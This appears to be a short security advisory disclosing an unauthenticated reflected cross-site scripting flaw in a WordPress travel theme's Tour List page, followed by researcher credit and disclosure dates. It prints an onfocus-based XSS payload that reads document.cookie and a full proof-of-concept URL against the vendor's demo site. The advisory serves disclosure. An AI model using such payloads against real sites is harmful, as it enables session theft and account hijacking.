The theme does not sanitise the keywords and start_date GET parameter on its Tour List page, leading to an unauthenticated reflected Cross-Site Scripting issue.
Payload: <input/Autofocus/%0D*/Onfocus=alert(`m0ze`);alert(document.cookie);//> https://boostifythemes.com/demo/wp/goto/tour-list/?keywords=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3B%2F%2F%3E&start_date=%3Cinput%2FAutofocus%2F%250D*%2FOnfocus%3Dalert%28%60m0ze%60%29%3Balert%28document.cookie%29%3B%2F%2F%3E&avaibility=13
m0ze
m0ze
Yes
2021-03-31 (about 2 years ago)
2021-03-31 (about 2 years ago)
2021-04-01 (about 2 years ago)